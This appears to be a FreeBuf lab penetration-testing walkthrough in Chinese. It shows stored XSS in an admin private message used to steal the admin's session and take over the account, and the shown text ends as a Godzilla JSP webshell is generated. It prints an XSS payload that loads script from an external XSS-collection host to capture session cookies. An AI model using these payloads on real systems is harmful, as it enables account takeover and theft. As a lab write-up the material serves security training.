渗透测试 | 从xss到内网投毒接管
2024-7-26 16:54:50 Author: www.freebuf.com(查看原文) 阅读量:18 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一、靶场条件:

1721983644_66a3629c272052c978a6b.png!small?1721983644576

二、通过xss接管管理页面

  • 使用注册用户test登录http://171.16.57.110/,登陆后为普通会员,且login登录后返回sessionid

1721982658_66a35ec2beab1b86ba5c6.png!small?1721982659300

  • 点击【联系管理员】,可以给管理员发站内邮件

1721982677_66a35ed540c683290f639.png!small?1721982677734

  • 点击【给管理员发私信】

1721982705_66a35ef1d91230e258b0d.png!small?1721982706387

  • 标题内容输入xss语句进行探测是否可以执行<img src=! onerror='alert(/xss/)'>

1721982762_66a35f2a62e7d9546e1a3.png!small?1721982762819

  • 提交后,点击该标题,可以看到脚本被执行,证明存在xss

1721982778_66a35f3a59674b623a195.png!small?1721982778882

1721982792_66a35f482c4a756c21300.png!small?1721982792590

  • 知道此处存在xss,现在进行session的获取,按步骤4,在标题和内容输入如下脚本(可注册海鸥系统http://xms.la/,自行配置xss项目,并生成xss代码),保存并提交:<img src=x

onerror=with(document)body.appendChild(document.createElement('script')).src="//xms.la/VTIT4">

1721982817_66a35f61274cef6d5edb0.png!small?1721982817799

  • 成功触发xss

1721982838_66a35f769e8f114711c91.png!small?1721982839046

  • 攻击者登录海鸥系统(http://xms.la/),成功得到session:2f74f6c4657b4dbf800dd3e6cfd897ee

1721982855_66a35f87683cfb304c757.png!small?1721982855846

  • 攻击者得到sessionid后,浏览器登录http://171.16.57.110/index,使用cookie editor插件修改浏览器会话信息,添加请求头cookie信息sessionID=026a7ea6d73f4e718623fa7027d03ea5

1721982882_66a35fa287a1609430682.png!small?1721982883051

  • 然后重新刷新http://171.16.57.110/index,发现已成功接管管理员账号

1721982897_66a35fb1daffb2723d0b0.png!small?1721982898440

  • 点击【会员管理】,升级test用户为管理员

1721982920_66a35fc800c24ad627790.png!small?1721982920423

1721982930_66a35fd28429230485e37.png!small?1721982931022

  • 扫描端口得知171.16.57.110存在7000端口

1721960425_66a307e9cc787bdcf0eeb.png!small?1721960426395

  • 直接访问提示spring报错

1721960436_66a307f48edc71e7173c8.png!small?1721960436932

1721982945_66a35fe1ec21bbd06209e.png!small?1721982946580

1721982956_66a35fec37ef8276c9671.png!small?1721982956683

  • 点击登录,尝试用演示论坛的test用户登录,登录成功

1721982967_66a35ff7aa37c5ec0fb6c.png!small?1721982968282

三、上传漏洞getshell

  • 打开哥斯拉,生成jsp一句话木马文件muma.jsp

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022


文章来源: https://www.freebuf.com/defense/407057.html
如有侵权请联系:admin#unsafe.sh